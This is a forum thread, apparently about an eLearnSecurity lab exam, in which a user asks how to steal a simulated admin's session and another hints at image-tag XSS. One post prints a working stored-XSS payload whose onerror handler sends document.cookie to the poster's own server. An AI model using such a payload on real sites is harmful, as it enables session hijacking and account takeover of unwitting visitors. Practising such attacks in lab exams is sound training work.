Jump to content
EH808

ELearnSecurity Exams

Recommended Posts

you can add img, img can have path to ...

you can add html tag with path to js....

if img have error can call some js....

you have to do it yourself. It is easy with google

Share this post


Link to post
Share on other sites
1 hour ago, igoj said:

you can add img, img can have path to ...

you can add html tag with path to js....

if img have error can call some js....

you have to do it yourself. It is easy with google

Hi @igoj, i exploited the wall.php page and i inserted a <img> that forward cookie to a my php web server. It is ok as approach and i'm able to steal admin cookies or the admin navigate only the ticket.php page?

Share this post


Link to post
Share on other sites

If you have admin's cookie you have access to admin panel.

Share this post


Link to post
Share on other sites
5 minutes ago, igoj said:

If you have admin's cookie you have access to admin panel.

ok but the admin (simulated in the platform) visit also the wall page or only the support page? Because i inserted the script only in the wall page.

Share this post


Link to post
Share on other sites
4 minutes ago, igoj said:

what will you admin's cookie?

I try to explain better my actions: i inserted this payload: 

<img src=x onerror="this.src='http://172.16.5.70:9999/get.php?cookie='+document.cookie; this.removeAttribute('onerror');">

inside the wall.php page to wait an admin to steal its cookie but after 1h, no admin access. So, i should i also expoliate the support page or not? Thank you!

Share this post


Link to post
Share on other sites

You have to test. Admin visit site max every 5 minutes.

It is worth to learn this.

Share this post


Link to post
Share on other sites
3 hours ago, igoj said:

You have to test. Admin visit site max every 5 minutes.

It is worth to learn this.

Hi igoj, i exploited also the support page by using a similar payload encrypted. So if i navigate the page, the script forward the cookies but after 1h, no admin visits the page. It is the correct approach to get admin authentication? I have no idea on how to find it.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...